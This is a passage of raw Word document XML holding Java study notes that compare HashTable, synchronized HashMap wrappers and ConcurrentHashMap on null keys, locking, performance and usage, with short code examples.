    <w:p w14:paraId="1120D74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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F056C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hashTable.put(null, 3);  // Throws NullPointerException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263EC84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atch (NullPointerException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5196CC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HashTable does not allow null keys.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2132E96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3930477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0C328B8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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1F981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ncMap.put(null, 3);    // Works fine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791A0F8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allows null key: " + syncMap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D2AD3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 catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684B3A7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System.out.println("SynchronizedMap error: " + e);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290DF4D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1775C1C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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B96DC1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0585083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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B98D48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ashTable: {Java=1, Python=2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111D77B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edMap: {Java=1, Python=2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32865DF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HashTable does not allow null keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF358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nchronizedMap allows null key: {null=3, Java=1, Python=2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134463DE"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pict w14:anchorId="6D49AE16">
          <v:rect id="_x0000_i7281" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B7F27F"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3. Performance Comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DECA7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Table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260A8A15"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for every method call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D600059"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Suitable for </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>low-concurrency environments</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA436D"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oor performance</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> under heavy concurrent access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F9986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p>
    <w:p w14:paraId="67592952"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Also locks the </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>entire map</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but since it wraps around a HashMap, it is slightly more </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flexible</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62931092" w14:textId="77777777" w:rsidR="005E15D1" w:rsidRPr="005E15D1" w:rsidRDefault="005E15D1" w:rsidP="005E15D1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Better for </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>moderate concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEF8C7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pict w14:anchorId="3EA868A5">
          <v:rect id="_x0000_i7282" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EC08B3"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4. Drawbacks of Bo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3537"/>
        <w:gridCol w:w="4699"/>
      </w:tblGrid>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="016E4058" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2816643D"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Drawback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E104E40"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HashTable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5296E223"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FBB0E7A" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DA72B7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Performance Issue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="113B304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Global lock on the entire map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26B6D94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Global lock on the entire map</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="6D0E0D06" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56273E4D"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Concurrency Issue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A8E03F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ot suitable for high-concurrency apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="753AD51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ot suitable for high-concurrency apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="2AE0DDC3" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F16A39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Iteration Issue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="328E3D1B"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eeds to be synchronized manually</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15CB149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Needs to be synchronized manually during iteration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="1B7D124C" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FA8489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Null Key/Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45F4F4D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Does not allow null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6162845F"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Allows null (potential risk in some cases)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2833A2A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pict w14:anchorId="5DC35616">
          <v:rect id="_x0000_i7283" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF3F7F2"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5. When to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gridCol w:w="2169"/>
      </w:tblGrid>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="013C5669" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D7BF4DA"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Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="076D254B"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Choose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="4E2B6918" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02CBBB69"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ingle-threaded or low concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CE166A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Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="24F2DBA1" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="726BA23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Moderate concurrency, synchronized access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="263A484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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E15D1" w:rsidRPr="005E15D1" w14:paraId="492F651B" w14:textId="77777777" w:rsidTr="005E15D1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13E06630"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igh concurrency, better performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22BD09D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ConcurrentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A469B2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pict w14:anchorId="29CA6329">
          <v:rect id="_x0000_i7284" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BAA838"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6. Why Prefer ConcurrentHashMap Over Both?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D434A7"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Uses </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segmented locking</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (locks on parts of the map, not the whole map).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F4A902"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Better performance</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for concurrent reads and writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6004905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No </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global lock</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like HashTable or SynchronizedHashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A230313"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Efficient for </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-threaded environments</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C39A7B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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE44A68"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Map&lt;String, Integer&gt; concurrentMap = new ConcurrentHashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53076EB1"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concurrentMap.put("Java", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E605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concurrentMap.put("Python", 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1132632A"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System.out.println("ConcurrentHashMap: " + concurrentMap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55130445"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pict w14:anchorId="544AD537">
          <v:rect id="_x0000_i7285" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5597A5E1" w14:textId="77777777" w:rsidR="005E15D1" w:rsidRPr="005E15D1" w:rsidRDefault="005E15D1" w:rsidP="005E15D1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C38846"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HashTable</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>old, legacy</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class, fully synchronized with </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>poor performance</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in multi-threaded scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294FAF9C"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SynchronizedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modern approach</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using HashMap with a synchronized wrapper, but still suffers from </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global locking</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7110C6C4" w14:textId="77777777" w:rsidR="005E15D1" w:rsidRPr="005E15D1" w:rsidRDefault="005E15D1" w:rsidP="005E15D1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high-concurrency environments</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, always prefer </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>better performance and scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="005E15D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3EAAFB" w14:textId="77777777" w:rsidR="00EE66E8" w:rsidRPr="004F2440" w:rsidRDefault="00EE66E8" w:rsidP="00EE66E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="7FEC5E67">
          <v:rect id="_x0000_i3940" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12322ADD"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90" w:name="_Toc197867404"/>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between HashTable and ConcurrentHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="190"/>
    </w:p>
    <w:p w14:paraId="31081E59" w14:textId="7D0296D3" w:rsidR="005420DA" w:rsidRPr="005420DA" w:rsidRDefault="005420DA" w:rsidP="00407DCB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Difference between HashTable and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4074"/>
        <w:gridCol w:w="4420"/>
      </w:tblGrid>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="0FD59A93" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
